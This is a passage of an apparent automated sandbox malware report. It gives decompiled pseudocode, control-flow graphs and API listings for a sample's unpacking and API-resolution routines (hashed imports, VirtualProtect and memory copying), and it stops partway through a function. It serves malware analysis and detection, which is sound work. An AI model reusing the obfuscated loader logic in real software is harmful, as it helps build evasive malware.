                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: 9b4b6e988e1f7f3fc54306e08b8be2e6e8bc16cc02cab19cb3cefda35cbe7a6e
                                                                                • Instruction ID: f403492ba3cc52469700d577aa938efc3591ed5cc0635259e15b4f0810791386
                                                                                • Opcode Fuzzy Hash: 9b4b6e988e1f7f3fc54306e08b8be2e6e8bc16cc02cab19cb3cefda35cbe7a6e
                                                                                • Instruction Fuzzy Hash: FC21D3307043015BEB24AF7ACC41B6B77A6ABD3B00F00852DB555CB290FAB9CD059795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 900 7a30a0-7a30b6 901 7a30ba-7a30bf 900->901 902 7a30c0-7a30c5 901->902 903 7a30cb 902->903 904 7a3201-7a3206 902->904 905 7a31ed-7a31f1 903->905 906 7a30d1-7a30d6 903->906 907 7a3208-7a320d 904->907 908 7a3245-7a324c 904->908 911 7a32f6-7a3300 905->911 912 7a31f7-7a31fc 905->912 913 7a31da-7a31e8 906->913 914 7a30dc-7a30e1 906->914 915 7a32ab-7a32b3 907->915 916 7a3213-7a3218 907->916 909 7a3269-7a3274 908->909 910 7a324e-7a3264 call 7a3f00 call 7a3e60 908->910 936 7a3291-7a329f RtlAllocateHeap 909->936 937 7a3276-7a328c call 7a3f00 call 7a3e60 909->937 910->909 912->902 913->902 920 7a31a0-7a31a8 914->920 921 7a30e7-7a30ec 914->921 917 7a32d3-7a32f3 915->917 918 7a32b5-7a32cd call 7a3f00 call 7a3e60 915->918 922 7a321a-7a3228 call 7a3d00 916->922 923 7a322d-7a3232 916->923 917->911 918->917 930 7a31aa-7a31c2 call 7a3f00 call 7a3e60 920->930 931 7a31c8-7a31d5 920->931 921->923 928 7a30f2-7a319b 921->928 922->901 923->902 924 7a3238-7a3242 923->924 928->901 930->931 931->901 936->911 940 7a32a1-7a32a6 936->940 937->936 940->901
                                                                                C-Code - Quality: 71%
                                                                                			E007A30A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x7ae1cc;
										if(_t95 == 0) {
											_t95 = E007A3E60(_t93, E007A3F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x7ae1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x7ae494;
							if(_t62 == 0) {
								_t62 = E007A3E60(_t93, E007A3F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x7ae494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x7add18 == 0) {
								 *0x7add18 = E007A3E60(_t93, E007A3F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x7ae43c;
								if(_t116 == 0) {
									_t116 = E007A3E60(_t93, E007A3F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x7ae43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E007A3D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x007a30a2
                                                                                0x007a30a6
                                                                                0x007a30ac
                                                                                0x007a30b1
                                                                                0x007a30b6
                                                                                0x007a30ba
                                                                                0x007a30ba
                                                                                0x007a30c0
                                                                                0x007a30c0
                                                                                0x007a30c0
                                                                                0x007a30c0
                                                                                0x007a30c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a30cb
                                                                                0x007a31f1
                                                                                0x007a32f9
                                                                                0x007a3300
                                                                                0x007a31f7
                                                                                0x007a31f7
                                                                                0x00000000
                                                                                0x007a31f7
                                                                                0x007a30d1
                                                                                0x007a30d6
                                                                                0x007a31e5
                                                                                0x00000000
                                                                                0x007a30dc
                                                                                0x007a30e1
                                                                                0x007a31a0
                                                                                0x007a31a8
                                                                                0x007a31c0
                                                                                0x007a31c2
                                                                                0x007a31c2
                                                                                0x007a31ce
                                                                                0x007a31d0
                                                                                0x007a30ba
                                                                                0x007a30ba
                                                                                0x00000000
                                                                                0x007a30ba
                                                                                0x007a30e7
                                                                                0x007a30ec
                                                                                0x00000000
                                                                                0x007a30f2
                                                                                0x007a30f2
                                                                                0x007a310d
                                                                                0x007a3111
                                                                                0x007a311f
                                                                                0x007a3123
                                                                                0x007a3130
                                                                                0x007a3139
                                                                                0x007a3147
                                                                                0x007a314b
                                                                                0x007a3153
                                                                                0x007a315b
                                                                                0x007a3175
                                                                                0x007a317f
                                                                                0x007a3187
                                                                                0x007a318b
                                                                                0x007a3193
                                                                                0x007a30ba
                                                                                0x007a30ba
                                                                                0x00000000
                                                                                0x007a30ba
                                                                                0x007a30ba
                                                                                0x007a30ec
                                                                                0x007a30e1
                                                                                0x007a30d6
                                                                                0x00000000
                                                                                0x007a30cb
                                                                                0x007a3206
                                                                                0x007a3245
                                                                                0x007a324c
                                                                                0x007a325f
                                                                                0x007a3264
                                                                                0x007a3264
                                                                                0x007a326b
                                                                                0x007a3274
                                                                                0x007a328c
                                                                                0x007a328c
                                                                                0x007a3299
                                                                                0x007a329b
                                                                                0x007a329f
                                                                                0x00000000
                                                                                0x007a32a1
                                                                                0x007a32a1
                                                                                0x00000000
                                                                                0x007a32a1
                                                                                0x007a3208
                                                                                0x007a320d
                                                                                0x007a32ab
                                                                                0x007a32b3
                                                                                0x007a32cb
                                                                                0x007a32cd
                                                                                0x007a32cd
                                                                                0x007a32e4
                                                                                0x007a32e6
                                                                                0x007a32ed
                                                                                0x007a32f0
                                                                                0x007a32f3
                                                                                0x00000000
                                                                                0x007a3213
                                                                                0x007a3218
                                                                                0x00000000
                                                                                0x007a321a
                                                                                0x007a3221
                                                                                0x007a3223
                                                                                0x007a30ba
                                                                                0x007a30ba
                                                                                0x00000000
                                                                                0x007a30ba
                                                                                0x007a30ba
                                                                                0x007a3218
                                                                                0x007a320d
                                                                                0x00000000
                                                                                0x007a322d
                                                                                0x007a322d
                                                                                0x007a3242
                                                                                0x00000000
                                                                                0x007a3242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 007A3299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 9f6712dc35042b608c95ccedd343c4ea5eac79dfcce4a75b5cbdda5a48b750c0
                                                                                • Instruction ID: d1f01347be1b28a58a9c8207d7313dd74dad9abcc3bae09d2bd72bcc3152d729
                                                                                • Opcode Fuzzy Hash: 9f6712dc35042b608c95ccedd343c4ea5eac79dfcce4a75b5cbdda5a48b750c0
                                                                                • Instruction Fuzzy Hash: A4519171B083068BC718DF6C848462BBBE6EBD6744F204A1EF452CB351DB39DE498792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00620580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1063 620580-6205be call 620ed0 1066 6205d2-6205da 1063->1066 1067 6205c0-6205cf 1063->1067 1068 6205e0-6205e3 1066->1068 1069 6206e7-6206ef 1066->1069 1068->1069 1070 6205e9-6205eb 1068->1070 1070->1069 1071 6205f1-6205fc 1070->1071 1071->1069 1073 620602-620607 1071->1073 1074 6206d8-6206e4 1073->1074 1075 62060d-620629 call 621140 RtlMoveMemory 1073->1075 1078 620654-620659 1075->1078 1079 62062b-620630 1075->1079 1082 62065b-62066a 1078->1082 1083 62066c-620678 1078->1083 1080 620632-620641 1079->1080 1081 620643-620652 1079->1081 1084 620679-620699 call 621140 1080->1084 1081->1084 1082->1084 1083->1084 1084->1069 1087 62069b-6206a3 VirtualProtect 1084->1087 1088 6206c6-6206d5 1087->1088 1089 6206a5-6206a8 1087->1089 1089->1069 1090 6206aa-6206ad 1089->1090 1090->1069 1091 6206af-6206b1 1090->1091 1091->1075 1092 6206b7-6206c3 1091->1092
                                                                                APIs
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00620F08
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00620F3E
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00620F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0062061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0062069C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284138323.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_620000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: 7588356ee3fc0aa0152c7f2ab4f382b059815de52994f70d90da18a659efe884
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: 7C317AB3654A2127F3248625FC45FEBA3C6D7E5354F08043AFA04D2251D53ED564CA65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1093 7a5ce0-7a5cec call 7a65e0 1096 7a5d09-7a5d0d ExitProcess 1093->1096 1097 7a5cee-7a5d04 call 7a3f00 call 7a3e60 1093->1097 1097->1096
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E007A65E0();
				if( *0x7addb8 == 0) {
					 *0x7addb8 = E007A3E60(_t5, E007A3F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x007a5ce0
                                                                                0x007a5cec
                                                                                0x007a5d04
                                                                                0x007a5d04
                                                                                0x007a5d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 007A5D0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 46b0d32fe6f83258f5190ea863a9aa1eec118b5341a92942ae5d078aa592203c
                                                                                • Instruction ID: 615e0f7ca71d7aa4b9400c60fdf90eecb40a2a7e5f867d33a129884df7e5ab2d
                                                                                • Opcode Fuzzy Hash: 46b0d32fe6f83258f5190ea863a9aa1eec118b5341a92942ae5d078aa592203c
                                                                                • Instruction Fuzzy Hash: 78D01274714204D7DF54AFB5584976A259A4BE3748F10811AF013CF696FE2CCD10B355
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00620AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00620F08
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00620F3E
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00620F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00620BFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284138323.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_620000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: e90b911d0186664a946509067a6c3a700ea345eba4c54d5c84c978c0f2b43f52
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 87512570740228BBEB208B54DE45FEAB7B9EF54701F004095FA08B7291D7B85D85CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402064, Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: #100
                                                                                • String ID:
                                                                                • API String ID: 1341478452-0
                                                                                • Opcode ID: d4e268cc97b58db7afbd037e22066ed19d30ab43755ea501b5b541365aee3679
                                                                                • Instruction ID: 1c47987104be7645d0cf7a4a22aa43c13d53cea405b34bf9c6b133d2953e3e55
                                                                                • Opcode Fuzzy Hash: d4e268cc97b58db7afbd037e22066ed19d30ab43755ea501b5b541365aee3679
                                                                                • Instruction Fuzzy Hash: 0D810EA244E7D14FC7038B748968691BFB1AE13220B1E42DBC5C1DF1F3D6AD484AC76A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A7080, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E007A7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E007A34C0(__ecx);
				if( *0x7add1c == 0) {
					 *0x7add1c = E007A3E60(__ebx, E007A3F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x7ae548; // 0x918118
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x7ae494;
				if(_t7 == 0) {
					_t7 = E007A3E60(_t15, E007A3F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x7ae494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x7adf30;
				if(_t9 == 0) {
					_t9 = E007A3E60(_t15, E007A3F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x7adf30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x007a7080
                                                                                0x007a7082
                                                                                0x007a7089
                                                                                0x007a7092
                                                                                0x007a70aa
                                                                                0x007a70aa
                                                                                0x007a70b0
                                                                                0x007a70b2
                                                                                0x007a70b8
                                                                                0x007a70bc
                                                                                0x007a70c3
                                                                                0x007a70d6
                                                                                0x007a70db
                                                                                0x007a70db
                                                                                0x007a70e2
                                                                                0x007a70e4
                                                                                0x007a70eb
                                                                                0x007a70fe
                                                                                0x007a7103
                                                                                0x007a7103
                                                                                0x007a7110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,007A721D,007A68AC), ref: 007A70B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 4e1c001dc053b5e079c7f01f4e20dd00adecce6553ed4297896dc43187919d71
                                                                                • Instruction ID: 46c53386ff0686e25891dd2475eb32aa33987d3bb602385cbefb9ba34352e1cd
                                                                                • Opcode Fuzzy Hash: 4e1c001dc053b5e079c7f01f4e20dd00adecce6553ed4297896dc43187919d71
                                                                                • Instruction Fuzzy Hash: 260162307142108B9B28AF799C5562B6AEB9BD76487108229B42ACB355FF3CCD029795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00620170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00620F08
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00620F3E
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00620F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 006202F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284138323.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_620000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: af41605bc42954a8142c1bc104ceb0ec868801cc773a53db4436e84c24b60dc3
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: 1C5189B1900668EBDB20DF60DD88BDEB779EF88700F00408AF509BB250DB745A85CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 0041FA20, Relevance: 87.8, APIs: 46, Strings: 4, Instructions: 318COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaFailedFriend.MSVBVM60(00000000,?,00000000), ref: 0041FA81
                                                                                • __vbaNew.MSVBVM60(00411590,00000000,?,00000000), ref: 0041FA91
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FA9C
                                                                                • __vbaStrCmp.MSVBVM60(0040F38C,0008000F), ref: 0041FAAE
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401938,004113E8,00000034), ref: 0041FAD2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401938,004113E8,00000034), ref: 0041FB02
                                                                                • __vbaStrCopy.MSVBVM60 ref: 0041FB1E
                                                                                • __vbaStrCopy.MSVBVM60 ref: 0041FB29
                                                                                • __vbaStrCmp.MSVBVM60(0040F38C,?), ref: 0041FB49
                                                                                • __vbaInStr.MSVBVM60(00000000,00411600,?,00000001), ref: 0041FB64
                                                                                • #581.MSVBVM60(?), ref: 0041FB6E
                                                                                • __vbaFpI4.MSVBVM60 ref: 0041FB74
                                                                                • __vbaInStr.MSVBVM60(00000000,00411600,?,00000001,?), ref: 0041FB94
                                                                                • #631.MSVBVM60(?,-00000001), ref: 0041FBA4
                                                                                • __vbaStrMove.MSVBVM60 ref: 0041FBAF
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041FBB8
                                                                                • __vbaInStr.MSVBVM60(00000000,00411600,?,00000001), ref: 0041FBCB
                                                                                • #581.MSVBVM60(?), ref: 0041FBD5
                                                                                • __vbaFpI4.MSVBVM60 ref: 0041FBDB
                                                                                • __vbaInStr.MSVBVM60(00000000,00411600,?,00000001,?), ref: 0041FBFB
                                                                                • #631.MSVBVM60(?,-00000001), ref: 0041FC0B
                                                                                • __vbaStrMove.MSVBVM60 ref: 0041FC16
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041FC1F
                                                                                • __vbaStrCmp.MSVBVM60(0040F38C,?), ref: 0041FC30
                                                                                • #581.MSVBVM60(?), ref: 0041FC3E
                                                                                • __vbaFpI4.MSVBVM60 ref: 0041FC44
                                                                                • __vbaStrCopy.MSVBVM60 ref: 0041FC51
                                                                                • __vbaNew.MSVBVM60(0040BAAC), ref: 0041FC5C
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FC67
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411614,00000028), ref: 0041FC8C
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411614,00000030), ref: 0041FCB1
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041FCD6
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411580,00000020), ref: 0041FD14
                                                                                • __vbaCastObj.MSVBVM60(?,00411614), ref: 0041FD23
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041FD2E
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041FD37
                                                                                • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041FD4B
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041FD61
                                                                                • __vbaFreeObj.MSVBVM60(0041FDB9), ref: 0041FDA8
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041FDAD
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041FDB6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$CheckHresult$#581Copy$#631AddrefMove$CastFailedFriendList
                                                                                • String ID: @$10,10,15,15$10,10,20,20$5,5,10,10,15,15
                                                                                • API String ID: 2647318331-3347459593
                                                                                • Opcode ID: 8bccfc0f73f2096b138939d07a6f7335f976992a7d271db61b2400860999791c
                                                                                • Instruction ID: d7b64355bc1eab8fc6c8e0e34e1b674775aefac8dba8eaecf672c991d6fd1ed2
                                                                                • Opcode Fuzzy Hash: 8bccfc0f73f2096b138939d07a6f7335f976992a7d271db61b2400860999791c
                                                                                • Instruction Fuzzy Hash: F9C12F71A00209EFDB14DFA4DD89AEEBBB9FF48701F10412AE505B7260D774A946CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A65E0, Relevance: 12.9, APIs: 2, Strings: 5, Instructions: 647COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 81%
                                                                                			E007A65E0() {
				intOrPtr _v8;
				char _v16;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v48;
				char _v76;
				signed int _v80;
				char _v88;
				char _v96;
				char _v100;
				char _v104;
				char _v112;
				signed int _v116;
				unsigned int _v120;
				signed int _v124;
				signed int _v128;
				void* __ebx;
				void* __ebp;
				intOrPtr _t205;
				signed int _t207;
				signed int _t211;
				void* _t221;
				void* _t228;
				signed int _t237;
				signed int _t239;
				void* _t241;
				void* _t242;
				signed int _t246;
				signed int _t254;
				signed int _t261;
				void* _t263;
				signed int _t265;
				signed int _t266;
				char* _t267;
				intOrPtr* _t268;
				void* _t273;
				intOrPtr _t275;
				void* _t276;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t283;
				signed int _t291;
